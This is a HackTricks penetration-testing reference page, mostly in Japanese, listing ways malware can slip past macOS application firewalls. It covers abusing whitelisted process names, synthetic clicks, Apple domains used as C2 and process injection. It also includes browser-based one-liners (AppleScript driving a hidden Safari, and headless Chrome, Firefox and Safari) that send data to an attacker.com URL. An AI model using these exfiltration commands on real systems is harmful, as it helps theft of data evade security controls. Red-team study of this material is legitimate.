macOS Bypassing Firewalls

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

発見された技術

以下の技術は、いくつかのmacOSファイアウォールアプリで動作することが確認されました。

ホワイトリスト名の悪用

例えば、**launchd**のようなよく知られたmacOSプロセスの名前でマルウェアを呼び出すこと。

合成クリック

ファイアウォールがユーザーに許可を求める場合、マルウェアに許可をクリックさせる。

Apple署名のバイナリを使用

**curlのようなもの、またwhois**のような他のものも。

よく知られたAppleドメイン

ファイアウォールは、**apple.comやicloud.com**のようなよく知られたAppleドメインへの接続を許可している可能性があります。そしてiCloudはC2として使用される可能性があります。

一般的なバイパス

ファイアウォールをバイパスするためのいくつかのアイデア。

許可されたトラフィックの確認

許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されたドメインや、どのアプリケーションがそれらにアクセスできるかを特定するのに役立ちます。

lsof -i TCP -sTCP:ESTABLISHED

DNSの悪用

DNS解決は、DNSサーバーに接続することが許可されていると思われる**mdnsreponder**署名アプリケーションを介して行われます。

ブラウザアプリを介して

oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

サファリ

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

プロセスインジェクションを介して

接続が許可されているプロセスにコードをインジェクトできれば、ファイアウォールの保護を回避できます：

macOS Process Abuse

参考文献

https://www.youtube.com/watch?v=UlT5KFTMn2k

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

PreviousmacOS AppleFS NextmacOS Defensive Apps

Last updated 1 day ago